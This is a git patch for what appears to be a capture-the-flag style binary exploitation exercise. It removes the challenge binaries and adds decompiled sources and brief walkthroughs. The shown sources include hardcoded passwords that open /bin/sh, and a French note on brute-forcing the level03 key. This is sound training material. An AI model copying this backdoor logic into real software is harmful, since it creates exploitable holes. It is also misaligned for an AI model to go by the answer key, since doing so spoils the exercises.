From 7dd0fe3f85c3e5a77178ea204e00c82f23afcce4 Mon Sep 17 00:00:00 2001 From: gbrochar Date: Wed, 2 Jul 2025 13:58:59 +0200 Subject: [PATCH] feat: walkthroughs and sources --- level00/Ressources/level00 | Bin 7280 -> 0 bytes level00/source | 19 ++ .../{Ressources/walktrough.md => walkthrough} | 0 level01/Ressources/level01 | Bin 7360 -> 0 bytes level01/source | 84 ++++++++ level01/walkthrough | 5 + level02/Ressources/level02 | Bin 9452 -> 0 bytes level02/Ressources/walktrough.md | 1 - level02/source | 73 +++++++ level02/walkthrough | 13 ++ level03/Ressources/level03 | Bin 7677 -> 0 bytes level03/source | 144 +++++++++++++ level03/walkthrough | 2 + level04/Ressources/level04 | Bin 7797 -> 0 bytes level04/Ressources/walkthrough.md | 72 ------- level04/source | 46 +++++ level04/walkthrough | 10 + level05/Ressources/level05 | Bin 5176 -> 0 bytes level05/Ressources/walktrough.md | 4 - level05/source | 35 ++++ level05/walkthrough | 4 + level06/Ressources/level06 | Bin 7907 -> 0 bytes level06/source | 71 +++++++ level06/walkthrough | 1 + level07/Ressources/exploit.txt | 40 ++++ level07/Ressources/level07 | Bin 11744 -> 0 bytes level07/source | 191 ++++++++++++++++++ level07/walkthrough | 6 + level08/Ressources/level08 | Bin 12975 -> 0 bytes level08/source | 113 +++++++++++ level08/walkthrough | 49 +---- level09/Ressources/level09 | Bin 12959 -> 0 bytes level09/source | 82 ++++++++ level09/walkthrough | 3 + 34 files changed, 948 insertions(+), 120 deletions(-) delete mode 100755 level00/Ressources/level00 create mode 100644 level00/source rename level00/{Ressources/walktrough.md => walkthrough} (100%) delete mode 100755 level01/Ressources/level01 create mode 100644 level01/source create mode 100644 level01/walkthrough delete mode 100755 level02/Ressources/level02 delete mode 100644 level02/Ressources/walktrough.md create mode 100644 level02/source create mode 100644 level02/walkthrough delete mode 100755 level03/Ressources/level03 create mode 100644 level03/source create mode 100644 level03/walkthrough delete mode 100755 level04/Ressources/level04 delete mode 100644 level04/Ressources/walkthrough.md create mode 100644 level04/source create mode 100644 level04/walkthrough delete mode 100755 level05/Ressources/level05 delete mode 100644 level05/Ressources/walktrough.md create mode 100644 level05/source create mode 100644 level05/walkthrough delete mode 100755 level06/Ressources/level06 create mode 100644 level06/source create mode 100644 level06/walkthrough create mode 100644 level07/Ressources/exploit.txt delete mode 100755 level07/Ressources/level07 create mode 100644 level07/source delete mode 100755 level08/Ressources/level08 create mode 100644 level08/source delete mode 100755 level09/Ressources/level09 create mode 100644 level09/source diff --git a/level00/Ressources/level00 b/level00/Ressources/level00 deleted file mode 100755 index a02f2900c99ecc92790ac734c7f38045209fa7d6..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 7280 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 diff --git a/level00/source b/level00/source new file mode 100644 index 0000000..07becb6 --- /dev/null +++ b/level00/source @@ -0,0 +1,19 @@ +bool main(void) + +{ + int local_14 [4]; + + puts("***********************************"); + puts("* \t -Level00 -\t\t *"); + puts("***********************************"); + printf("Password:"); + __isoc99_scanf(&DAT_08048636,local_14); + if (local_14[0] != 0x149c) { + puts("\nInvalid Password!"); + } + else { + puts("\nAuthenticated!"); + system("/bin/sh"); + } + return local_14[0] != 0x149c; +} diff --git a/level00/Ressources/walktrough.md b/level00/walkthrough similarity index 100% rename from level00/Ressources/walktrough.md rename to level00/walkthrough diff --git a/level01/Ressources/level01 b/level01/Ressources/level01 deleted file mode 100755 index d556e339c72017a817ff2a43841e3a1e8bfef245..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 7360 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 diff --git a/level03/source b/level03/source new file mode 100644 index 0000000..61c7267 --- /dev/null +++ b/level03/source @@ -0,0 +1,144 @@ + +int decrypt(EVP_PKEY_CTX *ctx,uchar *out,size_t *outlen,uchar *in,size_t inlen) + +{ + char cVar1; + uint uVar2; + int iVar3; + undefined4 *puVar4; + byte *pbVar5; + int in_GS_OFFSET; + bool bVar6; + bool bVar7; + uint local_2c; + undefined4 local_21; + undefined4 local_1d; + undefined4 local_19; + undefined4 local_15; + undefined local_11; + int local_10; + + local_10 = *(int *)(in_GS_OFFSET + 0x14); + local_21 = 0x757c7d51; + local_1d = 0x67667360; + local_19 = 0x7b66737e; + local_15 = 0x33617c7d; + local_11 = 0; + uVar2 = 0xffffffff; + puVar4 = &local_21; + do { + if (uVar2 == 0) break; + uVar2 = uVar2 - 1; + cVar1 = *(char *)puVar4; + puVar4 = (undefined4 *)((int)puVar4 + 1); + } while (cVar1 != '\0'); + local_2c = 0; + while( true ) { + bVar6 = local_2c < ~uVar2 - 1; + bVar7 = local_2c == ~uVar2 - 1; + if (!bVar6) break; + *(byte *)((int)&local_21 + local_2c) = (byte)ctx ^ *(byte *)((int)&local_21 + local_2c); + local_2c = local_2c + 1; + } + iVar3 = 0x11; + puVar4 = &local_21; + pbVar5 = (byte *)"Congratulations!"; + do { + if (iVar3 == 0) break; + iVar3 = iVar3 + -1; + bVar6 = *(byte *)puVar4 < *pbVar5; + bVar7 = *(byte *)puVar4 == *pbVar5; + puVar4 = (undefined4 *)((int)puVar4 + 1); + pbVar5 = pbVar5 + 1; + } while (bVar7); + if ((!bVar6 && !bVar7) == bVar6) { + iVar3 = system("/bin/sh"); + } + else { + iVar3 = puts("\nInvalid Password"); + } + if (local_10 == *(int *)(in_GS_OFFSET + 0x14)) { + return iVar3; + } + /* WARNING: Subroutine does not return */ + __stack_chk_fail(); +} + + +void test(int param_1,int param_2) +{ + EVP_PKEY_CTX *pEVar1; + uchar *in_stack_ffffffd8; + size_t *in_stack_ffffffdc; + uchar *in_stack_ffffffe0; + size_t in_stack_ffffffe4; + + pEVar1 = (EVP_PKEY_CTX *)(param_2 - param_1); + switch(pEVar1) { + default: + pEVar1 = (EVP_PKEY_CTX *)rand(); + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x1: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x2: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x3: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x4: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x5: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x6: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x7: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x8: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x9: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x10: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x11: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x12: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x13: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x14: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + break; + case (EVP_PKEY_CTX *)0x15: + decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4); + } + return; +} + +undefined4 main(void) +{ + uint __seed; + + __seed = time((time_t *)0x0); + srand(__seed); + puts("***********************************"); + puts("*\t\tlevel03\t\t**"); + puts("***********************************"); + printf("Password:"); + __isoc99_scanf(); + test(); + return 0; +} + diff --git a/level03/walkthrough b/level03/walkthrough new file mode 100644 index 0000000..6cdd81e --- /dev/null +++ b/level03/walkthrough @@ -0,0 +1,2 @@ +On remarque dans le code un 0x1337d00d, on l'essaye en mot de passe et ca marche pas, il y a un gros switch statement, avec un script on test les valeurs proche et ca fonctionne. + diff --git a/level04/Ressources/level04 b/level04/Ressources/level04 deleted file mode 100755 index 02a72a84923f72124d9cb3eb731d16a9d29d3902..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 7797 zcmeHMeQ=b;8Q)6|JR}JLqXvlfMh}}R!Y0Qx6$JCil+h9A^wzNZQ$8p3~oG7VwIuoaz%CvN(Q?tL=pj$cqZ3StxUZ3PJ6_?FZc+(ha~Q%1|r`3`X1@Qs#OgNUSePbMkq}{}6Ie z11hzFXqWN=uyV-DAtRjuCQ(isBn$c$Y?GRSNm{n~9Xr%K2W9<`f!ZM>Y54+q1@r0?i6M0-||SfV|gUBEE0~Tdi=?_e}$?C*QI>T#%;){e$eM~5bKtKIChl3 zJo0$*%-erDdH7=ArSy02YJT&;ikH}LnxzdnR<{c;G25-W<%x=4tpDdJWM?G511&(l 